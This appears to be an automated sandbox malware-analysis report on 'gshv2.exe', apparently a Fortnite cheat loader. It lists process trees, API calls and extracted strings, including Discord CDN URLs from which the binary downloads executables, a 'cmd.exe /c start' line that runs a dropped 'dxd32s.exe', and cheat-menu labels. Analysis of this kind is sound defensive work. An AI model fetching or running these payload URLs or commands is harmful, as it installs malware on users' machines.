2024-12-27 12:35:05 UTC	627	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Dec 2024 12:35:05 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1C%2FZUX%2BBE3akSylxAb9CToCJGmDjyAU3CHzntD4QmbR9Ddx5Okl3Hm9ggR2YTwkNsVVVRFUPFKQJLjy4qD7ZsuDF1cjTWP7woS2MtP7beWmDTSc1PDL%2BkS7cOxeDXZRLwKLUzA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Server: cloudflare CF-RAY: 8f8959347bbb42ea-EWR alt-svc: h3=":443"; ma=86400
2024-12-27 12:35:05 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Target ID:	0
Start time:	07:34:54
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\gshv2.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\gshv2.exe"
Imagebase:	0x7ff62c0a0000
File size:	254'976 bytes
MD5 hash:	27F0E3DBF939AE14775E062A8445F0E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:34:54
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:34:59
Start date:	27/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start C:\Windows\System32\dxd32s.exe
Imagebase:	0x7ff6922f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	31.8%
Total number of Nodes:	1964
Total number of Limit Nodes:	5

Executed Functions

Function 00007FF62C0CCFD0 Relevance: 216.1, APIs: 104, Strings: 19, Instructions: 826
threadprocesssleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileA.URLMON ref: 00007FF62C0CD01F

Part of subcall function 00007FF62C0CE910: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF62C0CD0CC), ref: 00007FF62C0CE968

SleepEx.KERNEL32 ref: 00007FF62C0CD192
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CD1A4
CreateThread.KERNEL32 ref: 00007FF62C0CD1C1
URLDownloadToFileW.URLMON ref: 00007FF62C0CD1DF
CreateFileW.KERNEL32 ref: 00007FF62C0CD24B
GetStdHandle.KERNEL32 ref: 00007FF62C0CD266
SleepEx.KERNEL32 ref: 00007FF62C0CD2BA
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CD2C2
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CD272

Part of subcall function 00007FF62C0C5EF0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF62C0C5F14
Part of subcall function 00007FF62C0C5EF0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF62C0C5F35

SetConsoleTitleA.KERNEL32 ref: 00007FF62C0CD2ED
GetLastError.KERNEL32 ref: 00007FF62C0CD2F3
FormatMessageA.KERNEL32 ref: 00007FF62C0CD31E
GetStdHandle.KERNEL32 ref: 00007FF62C0CD329
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CD335
Sleep.KERNEL32 ref: 00007FF62C0CD388
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CD395
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CD3BA
FindWindowA.USER32 ref: 00007FF62C0CD3CE
GetWindowThreadProcessId.USER32 ref: 00007FF62C0CD3E5
GetWindowRect.USER32 ref: 00007FF62C0CD3F6
DeviceIoControl.KERNEL32 ref: 00007FF62C0CD446
GetStdHandle.KERNEL32 ref: 00007FF62C0CD45C
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CD468
CreateThread.KERNEL32 ref: 00007FF62C0CD4D0
GetStdHandle.KERNEL32 ref: 00007FF62C0CD4E9
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CD4F5
Sleep.KERNEL32 ref: 00007FF62C0CD548
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CD555
FindWindowA.USER32 ref: 00007FF62C0CD569
GetWindowThreadProcessId.USER32 ref: 00007FF62C0CD580
GetWindowRect.USER32 ref: 00007FF62C0CD591
DeviceIoControl.KERNEL32 ref: 00007FF62C0CD5E1
GetStdHandle.KERNEL32 ref: 00007FF62C0CD5F7
CreateThread.KERNEL32 ref: 00007FF62C0CD66B
DeviceIoControl.KERNEL32 ref: 00007FF62C0CD8E9
GetStdHandle.KERNEL32 ref: 00007FF62C0CD8FF
CreateThread.KERNEL32 ref: 00007FF62C0CD973
DeviceIoControl.KERNEL32 ref: 00007FF62C0CDBF1
GetStdHandle.KERNEL32 ref: 00007FF62C0CDC07
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CDC13
CreateThread.KERNEL32 ref: 00007FF62C0CDC7B
DeviceIoControl.KERNEL32 ref: 00007FF62C0CDEFA
GetStdHandle.KERNEL32 ref: 00007FF62C0CDF10
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CDF1C
CreateThread.KERNEL32 ref: 00007FF62C0CDF84
CloseHandle.KERNEL32 ref: 00007FF62C0CDF8D
CloseHandle.KERNEL32 ref: 00007FF62C0CDC84

Part of subcall function 00007FF62C0CE300: DefWindowProcA.USER32 ref: 00007FF62C0CE6A1
Part of subcall function 00007FF62C0CE300: PostQuitMessage.USER32 ref: 00007FF62C0CE765
Part of subcall function 00007FF62C0CE300: exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CE770

GetStdHandle.KERNEL32 ref: 00007FF62C0CDC94
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CDCA0
Sleep.KERNEL32 ref: 00007FF62C0CDCF3
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CDD00
GetWindowThreadProcessId.USER32 ref: 00007FF62C0CDD14
GetWindowRect.USER32 ref: 00007FF62C0CDD25
DeviceIoControl.KERNEL32 ref: 00007FF62C0CDD75
GetStdHandle.KERNEL32 ref: 00007FF62C0CDD8B
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CDD98
CreateThread.KERNEL32 ref: 00007FF62C0CDE00
CloseHandle.KERNEL32 ref: 00007FF62C0CDE09
GetStdHandle.KERNEL32 ref: 00007FF62C0CDE19
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CDE25
Sleep.KERNEL32 ref: 00007FF62C0CDE78
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CDE85
GetWindowThreadProcessId.USER32 ref: 00007FF62C0CDE99
GetWindowRect.USER32 ref: 00007FF62C0CDEAA
CloseHandle.KERNEL32 ref: 00007FF62C0CD97C

Part of subcall function 00007FF62C0CE300: exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CE638

SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CD90B

Part of subcall function 00007FF62C0CE170: exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CE2F1

GetStdHandle.KERNEL32 ref: 00007FF62C0CD98C
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CD998
Sleep.KERNEL32 ref: 00007FF62C0CD9EB
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CD9F8
GetWindowThreadProcessId.USER32 ref: 00007FF62C0CDA0C
GetWindowRect.USER32 ref: 00007FF62C0CDA1D
DeviceIoControl.KERNEL32 ref: 00007FF62C0CDA6D
GetStdHandle.KERNEL32 ref: 00007FF62C0CDA83
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CDA8F
CreateThread.KERNEL32 ref: 00007FF62C0CDAF7
CloseHandle.KERNEL32 ref: 00007FF62C0CDB00
GetStdHandle.KERNEL32 ref: 00007FF62C0CDB10
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CDB1C
Sleep.KERNEL32 ref: 00007FF62C0CDB6F
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CDB7C
GetWindowThreadProcessId.USER32 ref: 00007FF62C0CDB90
GetWindowRect.USER32 ref: 00007FF62C0CDBA1
CloseHandle.KERNEL32 ref: 00007FF62C0CD674

Part of subcall function 00007FF62C0CE300: SetWindowPos.USER32 ref: 00007FF62C0CE516
Part of subcall function 00007FF62C0CE300: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0CE606
Part of subcall function 00007FF62C0CE300: DestroyWindow.USER32 ref: 00007FF62C0CE612

SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CD603

Part of subcall function 00007FF62C0CE170: CreateThread.KERNEL32 ref: 00007FF62C0CE196
Part of subcall function 00007FF62C0CE170: RegisterClassExA.USER32 ref: 00007FF62C0CE1EB
Part of subcall function 00007FF62C0CE170: GetClientRect.USER32 ref: 00007FF62C0CE208
Part of subcall function 00007FF62C0CE170: ClientToScreen.USER32 ref: 00007FF62C0CE21D
Part of subcall function 00007FF62C0CE170: CreateWindowExA.USER32 ref: 00007FF62C0CE28B
Part of subcall function 00007FF62C0CE170: DwmExtendFrameIntoClientArea.DWMAPI ref: 00007FF62C0CE2A2
Part of subcall function 00007FF62C0CE170: SetWindowLongA.USER32 ref: 00007FF62C0CE2B8
Part of subcall function 00007FF62C0CE170: ShowWindow.USER32 ref: 00007FF62C0CE2C8
Part of subcall function 00007FF62C0CE170: UpdateWindow.USER32 ref: 00007FF62C0CE2D5

Part of subcall function 00007FF62C0CC890: Direct3DCreate9Ex.D3D9 ref: 00007FF62C0CC8A0
Part of subcall function 00007FF62C0CC890: exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CC8AF
Part of subcall function 00007FF62C0CC890: QueryPerformanceFrequency.KERNEL32 ref: 00007FF62C0CC97E
Part of subcall function 00007FF62C0CC890: QueryPerformanceCounter.KERNEL32 ref: 00007FF62C0CC993

GetStdHandle.KERNEL32 ref: 00007FF62C0CD684
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CD690
Sleep.KERNEL32 ref: 00007FF62C0CD6E3
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CD6F0
GetWindowThreadProcessId.USER32 ref: 00007FF62C0CD704
GetWindowRect.USER32 ref: 00007FF62C0CD715
DeviceIoControl.KERNEL32 ref: 00007FF62C0CD765
GetStdHandle.KERNEL32 ref: 00007FF62C0CD77B
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CD787
CreateThread.KERNEL32 ref: 00007FF62C0CD7EF
CloseHandle.KERNEL32 ref: 00007FF62C0CD7F8
GetStdHandle.KERNEL32 ref: 00007FF62C0CD808
SetConsoleTextAttribute.KERNEL32 ref: 00007FF62C0CD814
Sleep.KERNEL32 ref: 00007FF62C0CD867
system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CD874
GetWindowThreadProcessId.USER32 ref: 00007FF62C0CD888
GetWindowRect.USER32 ref: 00007FF62C0CD899
CloseHandle.KERNEL32 ref: 00007FF62C0CD4D9

Part of subcall function 00007FF62C0CE300: PeekMessageA.USER32 ref: 00007FF62C0CE35C
Part of subcall function 00007FF62C0CE300: TranslateMessage.USER32 ref: 00007FF62C0CE36D
Part of subcall function 00007FF62C0CE300: DispatchMessageA.USER32 ref: 00007FF62C0CE37A
Part of subcall function 00007FF62C0CE300: GetForegroundWindow.USER32 ref: 00007FF62C0CE380
Part of subcall function 00007FF62C0CE300: GetWindow.USER32 ref: 00007FF62C0CE397
Part of subcall function 00007FF62C0CE300: SetWindowPos.USER32 ref: 00007FF62C0CE3BD
Part of subcall function 00007FF62C0CE300: GetAsyncKeyState.USER32 ref: 00007FF62C0CE3C8
Part of subcall function 00007FF62C0CE300: GetClientRect.USER32 ref: 00007FF62C0CE3EF
Part of subcall function 00007FF62C0CE300: ClientToScreen.USER32 ref: 00007FF62C0CE401
Part of subcall function 00007FF62C0CE300: GetCursorPos.USER32 ref: 00007FF62C0CE438
Part of subcall function 00007FF62C0CE300: GetAsyncKeyState.USER32 ref: 00007FF62C0CE471

Strings

03:21:08, xrefs: 00007FF62C0CCDB5
3lL, xrefs: 00007FF62C0CDF43
E/H/, xrefs: 00007FF62C0CD1F3
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00007FF62C0CCD4F
(, xrefs: 00007FF62C0CDED1
https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exe, xrefs: 00007FF62C0CD016
,0\, xrefs: 00007FF62C0CDE54
Sep 14 2022, xrefs: 00007FF62C0CCD8C
x/y/, xrefs: 00007FF62C0CD1E5
F/T/, xrefs: 00007FF62C0CD20F
Fortnite , xrefs: 00007FF62C0CD39B
C:\Windows\System32\, xrefs: 00007FF62C0CD0E0
https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe, xrefs: 00007FF62C0CD1D6
CLS, xrefs: 00007FF62C0CD38E, 00007FF62C0CD54E, 00007FF62C0CD6E9, 00007FF62C0CD86D, 00007FF62C0CD9F1, 00007FF62C0CDB75, 00007FF62C0CDCF9, 00007FF62C0CDE7E
.exe, xrefs: 00007FF62C0CD0F4
dxd32s, xrefs: 00007FF62C0CD108
C:\Windows\INF\Hook64.exe, xrefs: 00007FF62C0CD1CF
kM[I, xrefs: 00007FF62C0CD28C
C:\Windows\System32\dxd32s.exe, xrefs: 00007FF62C0CD00F

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: Window$Handle$ConsoleThread$AttributeText$Create$RectSleepsystem$CloseControlDeviceProcess$ClientMessageexit$File$AsyncDownloadFindPerformanceQueryScreenState$AreaClassCounterCreate9CursorDestroyDirect3DispatchErrorExtendForegroundFormatFrameFrequencyIntoLastLongPeekPostProcQuitRegisterShowTitleTranslateUpdate__acrt_iob_func__stdio_common_vfprintf_invalid_parameter_noinfo_noreturnfree
String ID: ($,0\$.exe$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$03:21:08$3lL$C:\Windows\INF\Hook64.exe$C:\Windows\System32\$C:\Windows\System32\dxd32s.exe$CLS$E/H/$F/T/$Fortnite $Sep 14 2022$dxd32s$https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exe$https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe$kM[I$x/y/
API String ID: 2141492094-1272919877
Opcode ID: aff7b389b3a8d752304e35c1caf816fbdf3f9c0eab3bd37aad2f3f4083a9742f
Instruction ID: 8d28c15f3c2b7c601c0610db41e22735e68a7fb1986130c50233a916e569e15b
Opcode Fuzzy Hash: aff7b389b3a8d752304e35c1caf816fbdf3f9c0eab3bd37aad2f3f4083a9742f
Instruction Fuzzy Hash: DEA26F32E08B8285FB00DB64EC441BD3761FF88764F404535EA5D92AA9DF3DE649C752

Function 00007FF62C0C73B0 Relevance: 3.0, APIs: 2, Instructions: 10
keyboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetAsyncKeyState.USER32 ref: 00007FF62C0C73B9
SleepEx.KERNEL32 ref: 00007FF62C0C73D6

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: AsyncSleepState
String ID:
API String ID: 21662186-0
Opcode ID: c04e03b3ab2296f50d0e424dbbbb252c5912ebf8b0a9f1bcc88de5fb0d83bd2b
Instruction ID: e6d76131ffbff6c16fa2b186df40023d2ba7f01417147dc370a850f17921cf65
Opcode Fuzzy Hash: c04e03b3ab2296f50d0e424dbbbb252c5912ebf8b0a9f1bcc88de5fb0d83bd2b
Instruction Fuzzy Hash: F7D0C924D4C28792FF191B24AC183381A54EF17761F1400B8C55E822E1CF2E7988C323

Function 00007FF62C0CFDBC Relevance: 13.6, APIs: 9, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF62C0CFDD0
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF62C0CFDE5
__scrt_release_startup_lock.LIBCMT ref: 00007FF62C0CFE53
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CFEA1
_get_initial_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CFEA6
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CFEAE
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CFEB6
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CFED8
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF62C0CFF32

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
String ID:
API String ID: 120244420-0
Opcode ID: d89613799273177604e8257d9d8096a4adfa473315e9760406a7edf7c72bfb88
Instruction ID: 1d31b8a4578ae7796749932ab44f71188986f3b2d9a5e27dad730bf64e065950
Opcode Fuzzy Hash: d89613799273177604e8257d9d8096a4adfa473315e9760406a7edf7c72bfb88
Instruction Fuzzy Hash: 76311B21E0820382FE14AB24AC517BD5791EF867A8F444035E94DC72D7DF6FEA4586A3

Function 00007FF62C0C5EF0 Relevance: 3.0, APIs: 2, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF62C0C5F14
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF62C0C5F35

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf
String ID:
API String ID: 2168557111-0
Opcode ID: 590d650156d2139e1e28312ff60c172adc136865ae5468f88b51044aa0b75e22
Instruction ID: 84f142ad0e966f49695c1d9ff1ad18d3fa5cdd9d33a244ca9ef9b56816c8eb45
Opcode Fuzzy Hash: 590d650156d2139e1e28312ff60c172adc136865ae5468f88b51044aa0b75e22
Instruction Fuzzy Hash: F2E03072608B8182D6008B50FC0455AB3A4FBD87D5F404035EF8C47A24DF7CC5A4CB41

Non-executed Functions

Function 00007FF62C0C9F80 Relevance: 136.5, APIs: 11, Strings: 66, Instructions: 1778
keyboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClientRect.USER32 ref: 00007FF62C0C9FD9
QueryPerformanceCounter.KERNEL32 ref: 00007FF62C0CA007
GetKeyState.USER32 ref: 00007FF62C0CA044
GetKeyState.USER32 ref: 00007FF62C0CA05A
GetKeyState.USER32 ref: 00007FF62C0CA070
ClientToScreen.USER32 ref: 00007FF62C0CA0BC
SetCursorPos.USER32 ref: 00007FF62C0CA0C8
GetActiveWindow.USER32 ref: 00007FF62C0CA0DB
GetCursorPos.USER32 ref: 00007FF62C0CA0EE
ScreenToClient.USER32 ref: 00007FF62C0CA103
GetCursorPos.USER32 ref: 00007FF62C0CA1B0

Part of subcall function 00007FF62C0C2980: memcpy.VCRUNTIME140 ref: 00007FF62C0C2A75

Part of subcall function 00007FF62C0B2100: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B216E
Part of subcall function 00007FF62C0B2100: memcpy.VCRUNTIME140 ref: 00007FF62C0B218D
Part of subcall function 00007FF62C0B2100: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B21B4

Strings

Reset Dx, xrefs: 00007FF62C0CC4F2
Skeleton Only Behind Walls, xrefs: 00007FF62C0CB2B9
2, xrefs: 00007FF62C0C8E7B
##Misc, xrefs: 00007FF62C0CBEBD, 00007FF62C0CBEEC
Trigger spray distance limit (m), xrefs: 00007FF62C0CB838
No bloom (HIGH RISK), xrefs: 00007FF62C0CB9B3
Aimbot Aim Line, xrefs: 00007FF62C0CC010
Show menu on start, xrefs: 00007FF62C0CC204
Supply/Chest/Ammno/Trap Distance Limit (m), xrefs: 00007FF62C0CB3E0
Trap/Projectiles/ ESP, xrefs: 00007FF62C0CB554
SpeedHack Toggle/Hotkey, xrefs: 00007FF62C0CBC21
2, xrefs: 00007FF62C0C947C
Neck Rate, xrefs: 00007FF62C0CAB29
Scale Text, xrefs: 00007FF62C0CC2C9
No spread (HIGH RISK), xrefs: 00007FF62C0CBA30
Stream Proof, xrefs: 00007FF62C0CC37B
Velocity Adjust, xrefs: 00007FF62C0CAE85
Vehicle ESP, xrefs: 00007FF62C0CB4A2
Debug Info, xrefs: 00007FF62C0CBEF8
Delay (ms), xrefs: 00007FF62C0CB745
ManhattenQC ESP, xrefs: 00007FF62C0CC3F8
Silent Aim, xrefs: 00007FF62C0CBAF2
Player Teleport (may freeze), xrefs: 00007FF62C0CBCEC
Visibilty Check, xrefs: 00007FF62C0CBF97
Aimbot Fov Circle, xrefs: 00007FF62C0CC0DD
Pickup Distance Limit(m), xrefs: 00007FF62C0CB363
[%.fM], xrefs: 00007FF62C0C92E7, 00007FF62C0C9A98
CheatLoverz.store, xrefs: 00007FF62C0CA250
Aimbot Key, xrefs: 00007FF62C0CAA27
Head Rate, xrefs: 00007FF62C0CAAA1
Discord server, xrefs: 00007FF62C0CC4C5
Misc, xrefs: 00007FF62C0CA79F, 00007FF62C0CA808
Skeleton ESP, xrefs: 00007FF62C0CB1EC
Shake Speed (cm/s), xrefs: 00007FF62C0CAF7C
Instant Revive, xrefs: 00007FF62C0CBD9E
Aimbot Distance Limit (m), xrefs: 00007FF62C0CAE08
Refresh Rate, xrefs: 00007FF62C0CAC91
##Exploits, xrefs: 00007FF62C0CB6E5, 00007FF62C0CB714
Crosshair, xrefs: 00007FF62C0CC10A
Vehicle Distance Limit (m), xrefs: 00007FF62C0CB4D7
Radar Position (X,Y)%, xrefs: 00007FF62C0CB0F9
Visuals Toggle Button, xrefs: 00007FF62C0CB5D1
Aim Shake (+- m), xrefs: 00007FF62C0CAF12
##Visuals, xrefs: 00007FF62C0CB099, 00007FF62C0CB0C8
Loot ESP, xrefs: 00007FF62C0CB2E6
Aim while jumping, xrefs: 00007FF62C0CC2FE
Triggerbot spread, xrefs: 00007FF62C0CB905
##Aimbot, xrefs: 00007FF62C0CA90B, 00007FF62C0CA93A
Triggerbot, xrefs: 00007FF62C0CB720
Teleport Vehicle to Map Marker (Key: Enter), xrefs: 00007FF62C0CBB27
Lines from crosshair/muzzle, xrefs: 00007FF62C0CC187
Debug World Items Max Distance (m), xrefs: 00007FF62C0CBF1D
Aimbot, xrefs: 00007FF62C0CA507, 00007FF62C0CA570, 00007FF62C0CA946
Exploits (DETECTION RISK!) Below, xrefs: 00007FF62C0CB932
Pelvis Rate, xrefs: 00007FF62C0CAC14
Radar Size(px), Resolution(m), xrefs: 00007FF62C0CB173
Chest Rate, xrefs: 00007FF62C0CAB97
Exploits, xrefs: 00007FF62C0CA64E, 00007FF62C0CA6B7
Aimbot Fov, xrefs: 00007FF62C0CAD8B
Aimbot Smooth, xrefs: 00007FF62C0CAD26
SpeedHack, xrefs: 00007FF62C0CBBA4
Visuals, xrefs: 00007FF62C0CA3BD, 00007FF62C0CA426
Limit Teleport Distance (No Damage Limit), xrefs: 00007FF62C0CBD21
Trigger distance limit (m), xrefs: 00007FF62C0CB7BF
Tips: Use middle mouse for sliders and F8 to toggle Menu, xrefs: 00007FF62C0CA293
Character ESP, xrefs: 00007FF62C0CB0D4

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: ClientCursorState$Screenmemcpy$ActiveCounterPerformanceQueryRectWindowfreemalloc
String ID: ##Aimbot$##Exploits$##Misc$##Visuals$2$2$Aim Shake (+- m)$Aim while jumping$Aimbot$Aimbot Aim Line$Aimbot Distance Limit (m)$Aimbot Fov$Aimbot Fov Circle$Aimbot Key$Aimbot Smooth$Character ESP$CheatLoverz.store$Chest Rate$Crosshair$Debug Info$Debug World Items Max Distance (m)$Delay (ms)$Discord server$Exploits$Exploits (DETECTION RISK!) Below$Head Rate$Instant Revive$Limit Teleport Distance (No Damage Limit)$Lines from crosshair/muzzle$Loot ESP$ManhattenQC ESP$Misc$Neck Rate$No bloom (HIGH RISK)$No spread (HIGH RISK)$Pelvis Rate$Pickup Distance Limit(m)$Player Teleport (may freeze)$Radar Position (X,Y)%$Radar Size(px), Resolution(m)$Refresh Rate$Reset Dx$Scale Text$Shake Speed (cm/s)$Show menu on start$Silent Aim$Skeleton ESP$Skeleton Only Behind Walls$SpeedHack$SpeedHack Toggle/Hotkey$Stream Proof$Supply/Chest/Ammno/Trap Distance Limit (m)$Teleport Vehicle to Map Marker (Key: Enter)$Tips: Use middle mouse for sliders and F8 to toggle Menu$Trap/Projectiles/ ESP$Trigger distance limit (m)$Trigger spray distance limit (m)$Triggerbot$Triggerbot spread$Vehicle Distance Limit (m)$Vehicle ESP$Velocity Adjust$Visibilty Check$Visuals$Visuals Toggle Button$[%.fM]
API String ID: 2372690006-378993347
Opcode ID: 787a01ce0175e07ad6569f3f0a62db25fe358f7210c8c78cf02ed56572ea0b2f
